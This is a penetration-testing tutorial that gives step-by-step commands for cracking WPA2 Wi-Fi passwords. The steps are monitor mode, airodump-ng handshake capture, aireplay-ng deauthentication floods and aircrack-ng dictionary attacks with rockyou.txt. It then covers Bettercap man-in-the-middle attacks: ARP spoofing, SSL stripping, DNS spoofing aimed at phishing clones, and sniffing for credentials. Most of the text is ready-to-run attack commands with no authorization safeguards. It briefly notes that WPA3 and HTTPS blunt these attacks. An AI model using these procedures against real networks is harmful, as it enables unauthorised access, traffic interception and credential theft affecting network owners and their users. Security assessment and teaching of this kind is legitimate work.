WPA2 Wi-Fi Cracking

WPA2 Wi-Fi Password Cracking

WPA2 Wi-Fi password cracking is the process of exploiting vulnerabilities in wireless networks to gain unauthorized access by targeting weak security configurations or poorly chosen passwords. This guide will cover the various techniques and tools used in Wi-Fi security assessments, focusing on capturing WPA2 handshakes, which are crucial for decrypting network passwords. Tools like Aircrack-ng and Hashcat are often used to capture and crack these handshakes, allowing penetration testers to test the strength of WPA2 encryption.

We will also explore common attack vectors, such as dictionary attacks, brute-force methods, and the use of deauthentication attacks to force reconnections and capture handshakes more efficiently. Understanding these techniques is essential for evaluating and strengthening the security of wireless networks, ensuring that they are properly protected against unauthorized access and attacks.

However, with the introduction of WPA3, many of these attacks become less effective due to stronger encryption and a feature called Simultaneous Authentication of Equals (SAE), which replaces the traditional pre-shared key (PSK) method. WPA3 also introduces protections against offline dictionary attacks, making it significantly harder to crack passwords using traditional methods. As a result, penetration testers must adopt different techniques when assessing networks secured by WPA3, as the common methods used for WPA2 cracking may not work on these newer networks.

Video Credit: David Bombal - Educational video on WPA2 and Wi-Fi Security.

Identifying Your Wireless Adapter

First, we need to identify our wireless adapter to ensure it is compatible with monitor mode, which is essential for packet capture. Use the command below to see available network interfaces:

iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.

wlan0     IEEE 802.11  Mode:Managed  Frequency:2.457 GHz  Tx-Power=20 dBm   
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:on

The output above shows that wlan0 is in Managed mode, which means it is connected to an access point. To conduct WiFi cracking, we need to switch it to monitor mode.

Enabling Monitor Mode

Before enabling monitor mode, it is important to kill any processes that could interfere with the operation of the wireless interface:

sudo airmon-ng check kill

Now, enable monitor mode on wlan0 using:

sudo airmon-ng start wlan0

Verify that the mode has changed to Monitor by running the following command again:

iwconfig
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:on

The interface name might have changed to wlan0mon, indicating that it is now in Monitor mode and ready for packet capture.

Scanning for Available Networks

Next, we will scan for available wireless networks. Use airodump-ng to gather information about nearby networks:

sudo airodump-ng wlan0mon

CH 13 ][ Elapsed: 0 s ][ 2024-10-12 20:44                                                                                  
                                                                                                                          
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID 
 00:00:00:00:00:00  -41  1          11    0     7  1300  WPA2 CCMP    PSK  ExampleWiFi

Identify the target network by noting its BSSID (MAC Address) and the Channel (CH) it is using. This information is crucial for the next steps.

Capturing Handshake Data

We will now capture packets to obtain the WPA2 handshake, which occurs when a device connects to the target network. Use the following command, replacing the placeholders with your captured details:

sudo airodump-ng -w capturefile -c 7 --bssid 00:00:00:00:00:00 wlan0mon

The above command will write captured packets to a file named capturefile. Once a client connects, a WPA handshake should be captured.

Forcing a Client to Reconnect

In some cases, you may need to force a device to disconnect so that it will reconnect, thereby allowing you to capture the handshake. This can be done by sending deauthentication packets:

sudo aireplay-ng --deauth 0 -a 00:00:00:00:00:00 wlan0mon

Wait for the handshake to be captured, which will appear in the terminal as [WPA Handshake: 00:00:00:00:00:00].

Cracking the Password

After capturing the handshake, the next step is to attempt to crack the WPA2 passphrase using a dictionary attack. Use aircrack-ng along with a wordlist like rockyou.txt:

aircrack-ng capturefile-01.cap -w /usr/share/wordlists/rockyou.txt

If the wordlist is compressed, unzip it first:

gunzip /usr/share/wordlists/rockyou.txt.gz

Aircrack-ng will then attempt to crack the passphrase by trying every password in the wordlist.

Video Credit: NetworkChuck- Wi-Fi Hacking

Introduction to Bettercap

Bettercap is a powerful and modular tool designed for network reconnaissance, penetration testing, and Man-in-the-Middle (MITM) attacks. With a wide range of capabilities, it allows attackers to intercept, modify, or even manipulate data being transmitted on a network. Bettercap works on many protocols, including HTTP, HTTPS, TCP, UDP, and more, and is highly effective for wireless network attacks. This guide will help you understand how to perform a MITM attack using Bettercap.

Installing Bettercap

To begin, you need to install Bettercap. This can be done through a package manager like apt on Debian-based systems, or by installing it manually via the Go language.

sudo apt-get update
sudo apt-get install bettercap

Alternatively, you can install Bettercap using Go:

go install github.com/bettercap/bettercap@latest

Setting Up Bettercap for MITM Attacks

Before initiating a MITM attack, ensure you have the correct network adapter in monitor mode. Use ifconfig or ip a to identify your network interfaces and then enable monitoring using airmon-ng or ip link.

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Launching Bettercap

To start Bettercap, simply use the following command:

sudo bettercap -iface wlan0

Replace wlan0 with your network interface name.

Performing ARP Spoofing with Bettercap

ARP spoofing is a technique that allows an attacker to position themselves between two communicating devices, intercepting their data in a MITM attack. Bettercap makes ARP spoofing straightforward. First, you need to identify the targets on the network:

net.probe on

This command will discover all active devices on the network. Once you have the IP addresses of your target, you can start ARP spoofing:

set arp.spoof.targets [target-ip]
arp.spoof on

Replace [target-ip] with the actual IP address of the device you want to target. You can also target multiple devices by separating the IPs with commas.

HTTP/HTTPS Traffic Interception

To intercept HTTP traffic, Bettercap has a built-in module called http.proxy. To enable it, use:

http.proxy on

Bettercap can also strip HTTPS and downgrade it to HTTP, making it easier to view transmitted data. Enable https.proxy:

https.proxy on

Keep in mind that HTTPS stripping will only work if clients ignore warnings about untrusted certificates, so this may not be effective on all targets.

DNS Spoofing

Another powerful feature of Bettercap is DNS spoofing, which allows you to redirect DNS requests to a fake IP address, such as a cloned website for phishing:

set dns.spoof.all true
dns.spoof on

With DNS spoofing enabled, all DNS requests on the network will be redirected to a specified IP address.

Sniffing Network Data

Bettercap includes a powerful sniffer module for capturing packets from the network:

net.sniff on

Bettercap will start capturing packets and displaying relevant information on the console. You can use various filters to capture only specific data, such as credentials or sensitive information.

SSL Stripping

SSL stripping is a method used to downgrade HTTPS to HTTP, allowing you to capture sensitive information transmitted over secure connections. To enable SSL stripping, use:

https.proxy on
set https.proxy.sslstrip true

This will force connections to use HTTP instead of HTTPS, making data easier to capture and analyze.

Disconnecting a Client

If you want to disconnect a specific client from the network to force reconnection (for instance, to capture data), you can use deauthentication attacks with Bettercap:

wifi.deauth [target-mac]

Replace [target-mac] with the MAC address of the device you want to disconnect. This will send deauthentication packets, disconnecting the target from the network momentarily.

Viewing Captured Traffic with Wireshark

Wireshark is a powerful tool that can be used to analyze the traffic captured during a MITM attack. After starting Bettercap’s sniffer, you can save the captured packets to a file and then analyze them using Wireshark.

First, make sure you have Wireshark installed:

sudo apt-get install wireshark

To save the captured packets in Bettercap, use the following command:

net.sniff.output /path/to/save/capture.pcap

Replace /path/to/save/capture.pcap with the desired file path where you want to save the packet capture.

Once you have saved the packets, open Wireshark and load the capture file:

wireshark /path/to/save/capture.pcap

Wireshark will provide a detailed view of the captured packets, allowing you to analyze various network protocols and identify sensitive information. Here are some tips for analyzing the traffic:

MITM Attacks Becoming Outdated

MITM attacks have become increasingly outdated due to the widespread adoption of HTTPS, which encrypts data between clients and servers. Unlike HTTP, which transmits information in plaintext, HTTPS ensures that sensitive data such as login credentials and personal information are securely transmitted, making it challenging for attackers to capture meaningful information without decrypting the traffic. Without access to the decryption key, intercepted data remains unreadable, significantly reducing the effectiveness of MITM attacks in modern networks. As a result, MITM attacks are mostly limited to situations where attackers can bypass or compromise encryption.